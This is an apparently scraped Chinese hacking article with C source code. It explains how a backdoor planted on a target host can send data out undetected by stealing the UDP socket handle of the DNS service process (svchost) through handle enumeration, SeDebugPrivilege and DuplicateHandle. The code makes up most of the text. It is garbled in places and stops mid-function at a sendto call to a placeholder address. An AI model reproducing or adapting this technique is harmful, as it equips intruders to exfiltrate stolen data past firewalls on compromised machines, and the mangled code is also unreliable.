1、一种新的穿透防火墙的数据传输技术一种新的穿透防火墙的数据传输技术使用该技术背景:在目标主机安放后门,需要将数据传输出去,同时数据很重要,动作不能太大.其他情况严重不推荐使用该技术(后面我会讲到为什么).针对目前防火墙的一些情况,如果自己的进程开一个端口(甚至是新建套接字)肯定被拦.相反,有一点我们也很清楚:被防火墙验证的进程在传送数据时永远不会被拦.所以,我的思路很简单:将其他进程中允许数据传输的套接字句柄拿为已用.过程如下:1. 找出目标进程2. 找出SOCKET句柄2. 用DuplicateHandle()函数将其SOCKET转换为能被自己使用.3. 用转换后的SOCKET进行数据传输上面
2、的过程写的很简单,但是实际实现起来还是存在一些问题(后面再做讨论).而且从上面的实现方法也可以看出一些不爽的地方:在目标进程的SOCKET不能是TCP,因为TCP的句柄已经跟外面建立了连接,所以只能是UDP.针对不同系统不同进程我们很难定位一个稳定的进程SOCKET.看到上面这些,你有点丧气了对不对,哈哈. 再想一想,其实我们有一条真正的通罗马的黄金大道.我们知道只要一台计算机连上了网络,那么有一种数据传输是肯定不会被拦截的,那就是DNS.你能想像域名解析数据都被拦了造成的结果吗? 嘿嘿, 既然这个是永远不会被拦的, 而且它又是UDP传输, 我们就拿他开刀.下面是通过直接控制DNS进程(其实也
3、就是svchost.exe,不过对应用户名是NETWORK SERVICE)进行数据传输的例子.编程中出现了很多问题,比方说获取svchost对应用户名时没有权限(但是能够操作LOCAL SERVICE),在句柄值为0x2c时进行getsockname时会停止运行等等.具体解决方法请细看注释部分./*+Made By ZwelLzwell2005.4.12-*/#include #include #include #pragma comment(lib, ws2_32)#pragma comment(lib, wtsapi32)#define NT_SUCCESS(status)(NTSTAT
4、US)(status)=0)#define STATUS_INFO_LENGTH_MISMATCH (NTSTATUS)0xC0000004L)typedef LONGNTSTATUS;typedef struct _SYSTEM_HANDLE_INFORMATIONULONGProcessId;UCHARObjectTypeNumber;UCHARFlags;USHORTHandle;PVOIDObject;ACCESS_MASKGrantedAccess; SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;typedef ULON
5、G (WINAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;BOOL LocateNtdllEntry ( void )BOOLret = FALSE;charNTDLL_DLL = ntdll.dll;HMODULE ntdll_dll = NULL;if ( ( ntdll_dll = GetModuleHandle( NTDLL_DLL ) ) = NULL )printf( GetModuleHandl
6、e() failed);return( FALSE );if ( !( ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( ntdll_dll, ZwQuerySystemInformation ) ) )goto LocateNtdllEntry_exit;ret = TRUE;LocateNtdllEntry_exit:if ( FALSE = ret )printf( GetProcAddress() failed);ntdll_dll = NULL;return( ret );/*+This ro
7、utine is used to get a processs username from its SID-*/BOOL GetUserNameFromSid(PSID pUserSid, char *szUserName)/ sanity checks and default valueif (pUserSid = NULL)return false;strcpy(szUserName, ?);SID_NAME_USE snu;TCHARszUser_MAX_PATH;DWORDchUser = _MAX_PATH;PDWORD pcchUser = &chUser; TCHARszDoma
8、in_MAX_PATH;DWORDchDomain = _MAX_PATH;PDWORD pcchDomain = &chDomain;/ Retrieve user name and domain name based on users SID.if (:LookupAccountSid(NULL, pUserSid, szUser, pcchUser, szDomain, pcchDomain, &snu)wsprintf(szUserName, %s, szUser);elsereturn false;return true;/*+This routine is used to get
9、the DNS processs IdHere, I use WTSEnumerateProcesses to get process user Sid, and then get the process user name. Beacause as its a NETWORK SERVICE, we cannt use OpenProcessToken to catch the DNS processs token information,even if we has the privilege in catching the SYSTEMs.-*/DWORD GetDNSProcessId
10、()PWTS_PROCESS_INFO pProcessInfo = NULL;DWORD ProcessCount = 0;charszUserName255;DWORDId = -1;if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, 0, 1, &pProcessInfo, &ProcessCount)/ dump each process descriptionfor (DWORD CurrentProcess = 0; CurrentProcess User.Sid, szAccountName,&dwAccountSize,sz
11、DomainName, &dwDomainSize, &snu);if(hProcess)CloseHandle(hProcess);if(hAccessToken)CloseHandle(hAccessToken);return true;*/*+Now, it is the most important stuff. _-*/SOCKET GetSocketFromId (DWORD PID)NTSTATUS status;PVOIDbuf = NULL;ULONGsize= 1;ULONGNumOfHandle = 0;ULONGi;PSYSTEM_HANDLE_INFORMATIONh
12、_info= NULL;HANDLEsock = NULL;DWORDn;buf=malloc(0x1000);if(buf = NULL)printf(malloc wrongn);return NULL;status = ZwQuerySystemInformation( 0x10, buf, 0x1000, &n );if(STATUS_INFO_LENGTH_MISMATCH = status)free(buf);buf=malloc(n);if(buf = NULL)printf(malloc wrongn);return NULL;status = ZwQuerySystemInf
13、ormation( 0x10, buf, n, NULL);elseprintf(ZwQuerySystemInformation wrongn);return NULL;NumOfHandle = *(ULONG*)buf;h_info = ( PSYSTEM_HANDLE_INFORMATION )(ULONG)buf+4);for(i = 0; i0)/ if port 0, then we can use itbreak;catch(.)continue;if ( buf != NULL )free( buf );return (SOCKET)sock;/*+This is not r
14、equired.-*/BOOL EnablePrivilege (PCSTR name)HANDLE hToken;BOOL rv;TOKEN_PRIVILEGES priv = 1, 0, 0, SE_PRIVILEGE_ENABLED ;LookupPrivilegeValue (0,name,&priv.Privileges0.Luid);priv.Privileges0.Attributes = SE_PRIVILEGE_ENABLED;OpenProcessToken(GetCurrentProcess (),TOKEN_ADJUST_PRIVILEGES,&hToken);Adju
15、stTokenPrivileges (hToken,FALSE,&priv,sizeof priv,0,0);rv = GetLastError () = ERROR_SUCCESS;CloseHandle (hToken);return rv;void main() WSADATA wsaData;chartestbuf255;SOCKETsock;sockaddr_in RecvAddr;int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);if (iResult != NO_ERROR)printf(Error at WSAStartup()
16、n);if(!LocateNtdllEntry()return;if(!EnablePrivilege (SE_DEBUG_NAME)printf(EnablePrivilege wrongn);return;sock = GetSocketFromId(GetDNSProcessId();if( sock=NULL)printf(GetSocketFromId wrongn);return;/Change there value.RecvAddr.sin_family = AF_INET;RecvAddr.sin_port = htons(5555); RecvAddr.sin_addr.s_addr = inet_addr(127.0.0.1);if(SOCKET_ERROR = sendto(sock, test, 5, 0, (